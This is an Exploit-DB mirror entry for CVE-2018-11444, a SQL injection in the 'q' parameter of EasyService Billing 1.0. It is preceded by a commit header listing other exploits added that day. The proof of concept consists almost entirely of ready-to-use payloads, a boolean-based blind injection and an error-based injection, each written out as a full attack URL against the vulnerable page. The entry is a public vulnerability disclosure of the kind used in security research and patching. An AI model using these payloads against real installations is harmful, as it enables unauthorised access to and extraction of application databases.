exploit-db-mirror/exploits/php/webapps/44765.txt
Offensive Security 6ba5b68c67 DB: 2018-05-27
8 changes to exploits/shellcodes

Symfony 2.7.0 < 4.0.10 - Denial of Service
Employee Work Schedule 5.9 - 'cal_id' SQL Injection
Ajax Full Featured Calendar 2.0 - 'search' SQL Injection
EasyService Billing 1.0 - Cross-Site Request Forgery
EasyService Billing 1.0 - Cross-Site Scripting
EasyService Billing 1.0 - 'q' SQL Injection
mySurvey 1.0 - 'id' SQL Injection
easyLetters 1.0 - 'id' SQL Injection
2018-05-27 05:01:47 +00:00

27 lines
No EOL
1.3 KiB
Text

<!--
# Exploit Title: EasyService Billing 1.0 SQL Injection on page jobcard-ongoing.php?q=
# Date: 25-05-2018
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594
# Exploit Author: Divya Jain
# Version: EasyService Billing 1.0
# CVE: CVE-2018-11444
# Category: Webapps
# Severity: High
# Tested on: KaLi LinuX_x64
# # # # # # # #
#
# Proof of Concept:
////////////////////////////////
SQL Injection in q parameter
///////////////////////////////
Affected Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=
# Boolean Based Blind SQL
Payload: 1337'OR%20NOT 1=1--
Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'OR%20NOT 1=1--
# Error-Based SQL
Payload: 1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD
Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD
#################################